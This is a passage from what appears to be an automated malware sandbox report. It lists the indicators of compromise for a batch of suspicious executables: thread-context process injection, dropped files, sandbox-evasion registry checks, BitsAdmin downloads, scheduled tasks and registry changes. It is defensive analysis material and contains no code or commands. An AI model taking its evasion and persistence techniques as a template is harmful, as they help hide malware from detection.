DHL4Bb1YNR_LuTP87OTPpPEl.exe PID 4928 set thread context of 5480 4928 _eaNdnN9tnNRXIFKGG2yF0fp.exe MrGh6bEH0L0a.exe PID 412 set thread context of 5480 412 MrGh6bEH0L0a.exe MrGh6bEH0L0a.exe PID 6576 set thread context of 3696 6576 cmd.exe svchost.exe PID 8276 set thread context of 8268 8276 compattelrunner.exe toolspab1.exe PID 8900 set thread context of 8356 8900 jdrbfsf toolspab1.exe PID 8832 set thread context of 3280 8832 toolspab1.exe toolspab1.exe PID 8764 set thread context of 7128 8764 toolspab1.exe toolspab1.exe PID 5084 set thread context of 6464 5084 jfiag3g_gg.exe wirbfsf PID 3696 set thread context of 7244 3696 svchost.exe svchost.exe PID 8800 set thread context of 5080 8800 wirbfsf wirbfsf -
Drops file in Program Files directory 64 IoCs
Processes:
SunLabsPlayer.exeLibraVPN.exeaq3T5oYFV8GDNuh6ZK8xkEpC.exeSunLabsPlayer.exeSunLabsPlayer.exelibravpn_setup.tmpSunLabsPlayer.exedata_load.exepowershell.exe12(((((.exedata_load.exedata_load.exeSetup.exeprolab.tmpultramediaburner.tmppowershell.exedescription ioc process File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\control\libgestures_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\bundle-app.js LibraVPN.exe File created C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libwaveout_plugin.dll aq3T5oYFV8GDNuh6ZK8xkEpC.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\log_out.png LibraVPN.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm_cmd.xml SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\modules\sandbox.luac SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-CNSEQ.tmp libravpn_setup.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files\temp_files\data.dll data_load.exe File created C:\Program Files (x86)\LibraVPN\openvpn\is-A8Q5H.tmp libravpn_setup.tmp File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\on_btn.png LibraVPN.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\my.png LibraVPN.exe File created C:\Program Files (x86)\LibraVPN\openvpn\64\openvpn\is-BHG86.tmp libravpn_setup.tmp File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\bw.png LibraVPN.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libtdummy_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\equalizer_window.html SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libty_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\keystore\libmemory_keystore_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\images\Video-48.png SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libtta_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\dk.png LibraVPN.exe File opened for modification C:\Program Files\temp_files\bckf.fon SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libvobsub_plugin.dll aq3T5oYFV8GDNuh6ZK8xkEpC.exe File opened for modification C:\Program Files (x86)\QRIvBFx powershell.exe File created C:\Program Files (x86)\Reference Assemblies\Pefefariny.exe 12(((((.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\vlc16x16.png aq3T5oYFV8GDNuh6ZK8xkEpC.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libidummy_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\liblogger_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\small-star-icon.png LibraVPN.exe File opened for modification C:\Program Files\temp_files\QRIvBFx.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libgnutls_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libstats_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\se.png LibraVPN.exe File created C:\Program Files\temp_files\QRIvBFx.dll data_load.exe File created C:\Program Files\temp_files\cache.dat data_load.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\custom.lua SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libmpgv_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\demux\libvoc_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\temp_files SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\koreus.luac SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libhttp_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\libnoseek_plugin.dll aq3T5oYFV8GDNuh6ZK8xkEpC.exe File created C:\Program Files\Common Files\KLOTBEAUID\prolab.exe.config 12(((((.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png SunLabsPlayer.exe File created C:\Program Files (x86)\lighteningplayer\libvlccore.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\misc\libaddonsvorepository_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\Data Finder\Versium Research\hjjgaa.exe Setup.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\LibraVPN\openvpn\html\static\assets\account.png LibraVPN.exe File opened for modification C:\Program Files (x86)\Picture Lab\SourceGrid2.dll prolab.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\gui\libqt_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_hevc_plugin.dll SunLabsPlayer.exe File created C:\Program Files (x86)\UltraMediaBurner\is-DRRC3.tmp ultramediaburner.tmp File opened for modification C:\Program Files (x86)\lighteningplayer\lua\http\mobile_browse.html SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\access\libcdda_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\lighteningplayer\plugins\video_splitter\libwall_plugin.dll SunLabsPlayer.exe File opened for modification C:\Program Files (x86)\QRIvBFx\cache.dat powershell.exe -
Drops file in Windows directory 6 IoCs
Processes:
MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exedescription ioc process File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2184 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 4364 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 4104 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 4752 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 5612 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 5804 5092 WerFault.exe mqnMtgWvbwILOMZrKc6CsUOn.exe 6236 3876 WerFault.exe Browzar.exe 6916 5072 WerFault.exe ypYDB0vdoDVBp7hsRzifyKGQ.exe 6028 4952 WerFault.exe MicrosoftEdgeCP.exe 5440 5644 WerFault.exe MicrosoftEdgeCP.exe 5220 9204 WerFault.exe rundll32.exe 6528 6796 WerFault.exe LibraVPN.exe 9088 4984 WerFault.exe MicrosoftEdgeCP.exe 6732 3928 WerFault.exe MicrosoftEdgeCP.exe -
Checks SCSI registry key(s) 3 TTPs 33 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
4590.exetoolspab1.exejdrbfsfwirbfsfjdrbfsfarnatic_2.exetoolspab1.exersrbfsfwirbfsfrsrbfsfMrGh6bEH0L0a.exedescription ioc process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4590.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MrGh6bEH0L0a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MrGh6bEH0L0a.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI MrGh6bEH0L0a.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI wirbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI arnatic_2.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4590.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI toolspab1.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 4590.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI jdrbfsf Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI rsrbfsf -
Checks processor information in registry 2 TTPs 18 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
svchost.exexe3VggU3QswqnlgTx1tHoeRE.exeWerFault.exe25D.exepowershell.exeWerFault.exeDFFC.exearnatic_1.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 svchost.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 xe3VggU3QswqnlgTx1tHoeRE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString xe3VggU3QswqnlgTx1tHoeRE.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz svchost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString 25D.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString powershell.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 25D.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 DFFC.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 powershell.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 arnatic_1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString arnatic_1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString DFFC.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Delays execution with timeout.exe 5 IoCs
Processes:
timeout.exetimeout.exetimeout.exetimeout.exetimeout.exepid process 1236 timeout.exe 7108 timeout.exe 5268 timeout.exe 580 timeout.exe 8624 timeout.exe -
Download via BitsAdmin 1 TTPs 5 IoCs
Processes:
bitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exebitsadmin.exepid process 5612 bitsadmin.exe 7856 bitsadmin.exe 7380 bitsadmin.exe 3936 bitsadmin.exe 4728 bitsadmin.exe -
Enumerates system info in registry 2 TTPs 7 IoCs
Processes:
chrome.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName chrome.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS chrome.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer chrome.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
Processes:
ipconfig.exepid process 6400 ipconfig.exe -
Kills process with taskkill 9 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 1916 taskkill.exe 6772 taskkill.exe 7944 taskkill.exe 8772 taskkill.exe 4280 taskkill.exe 1516 taskkill.exe 6832 taskkill.exe 6188 taskkill.exe 5148 taskkill.exe -
Processes:
browser_broker.exebrowser_broker.exebrowser_broker.exebrowser_broker.exeMicrosoftEdgeCP.exebrowser_broker.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main browser_broker.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
app.exeapp.exeypYDB0vdoDVBp7hsRzifyKGQ.exeapp.exesvchost.execmd.exesvchost.exedescription ioc process Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-81 = "Atlantic Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-172 = "Central Standard Time (Mexico)" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-832 = "SA Eastern Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-491 = "India Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-872 = "Pakistan Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1502 = "Turkey Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-111 = "Eastern Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2512 = "Lord Howe Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-932 = "Coordinated Universal Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2771 = "Omsk Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-192 = "Mountain Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-131 = "US Eastern Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-91 = "Pacific SA Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-302 = "Romance Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1911 = "Russia TZ 10 Daylight Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-732 = "Fiji Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2062 = "North Korea Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1722 = "Libya Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-752 = "Tonga Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-262 = "GMT Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-302 = "Romance Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-332 = "E. Europe Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-271 = "Greenwich Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1471 = "Magadan Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-2772 = "Omsk Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1501 = "Turkey Daylight Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1662 = "Bahia Standard Time" app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-365 = "Middle East Standard Time" app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-251 = "Dateline Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs cmd.exe Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs cmd.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates app.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs app.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-449 = "Azerbaijan Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time" ypYDB0vdoDVBp7hsRzifyKGQ.exe -
Modifies registry class 64 IoCs
Processes:
